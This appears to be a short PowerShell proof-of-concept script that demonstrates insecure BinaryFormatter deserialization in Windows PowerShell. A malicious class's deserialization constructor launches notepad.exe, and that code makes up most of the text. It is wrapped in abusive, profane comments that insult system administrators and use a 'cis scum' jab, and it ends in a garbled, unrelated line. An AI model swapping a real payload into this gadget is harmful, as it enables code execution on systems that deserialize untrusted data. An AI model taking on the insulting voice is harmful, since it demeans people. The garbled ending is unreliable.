Windows PowerShell Insecure deserialization. PowerShell Core has not been affected since ¬7.2.X . It's insecure deserialization because someone fat shamed it on the bus

BinaryFormatter_PoC_winpowershell.ps1

# BinaryFormatter back with vengence (it never left) because System Admins are too lazy to use PS Core. 'muh ISE' - die in a hole
[System.AppContext]::SetSwitch('Switch.System.Runtime.Serialization.EnableUnsafeBinaryFormatterSerialization', $true) # Final working version.
Add-Type @'
using System;
using System.Runtime.Serialization;
using System.Diagnostics;

[Serializable]
public class MaliciousPayload : ISerializable {
    public MaliciousPayload() { }
    
    protected MaliciousPayload(SerializationInfo info, StreamingContext context) {
        Process.Start("notepad.exe");
    }
    
    public void GetObjectData(SerializationInfo info, StreamingContext context) {
        info.SetType(typeof(MaliciousPayload));
    }
}
'@
$payload = [MaliciousPayload]::new()
$bf = [System.Runtime.Serialization.Formatters.Binary.BinaryFormatter]::new()
$stream = [System.IO.MemoryStream]::new()
$bf.Serialize($stream, $payload)
$stream.Position = 0
Write-Host "Deserializing malicious payload..."
$bf.Deserialize($stream)  # This will launch notepad.exe
Write-Host "Code executed during deserialization"
Write-Host "POWERSHELL CORE ISN'T THE CLOT SHOT MANDATE - JUST FUCKING DO IT AND STOP BEING A BITCH"

function Check-Priv { <# check your priviledge cis scum #> return (([Security.Principal.WindowsIdentity]::GetCurrent()).Groups -contains "S-1-5-32-544") }

Why is MR CLAUDE MAN NOT LIKE HENLo world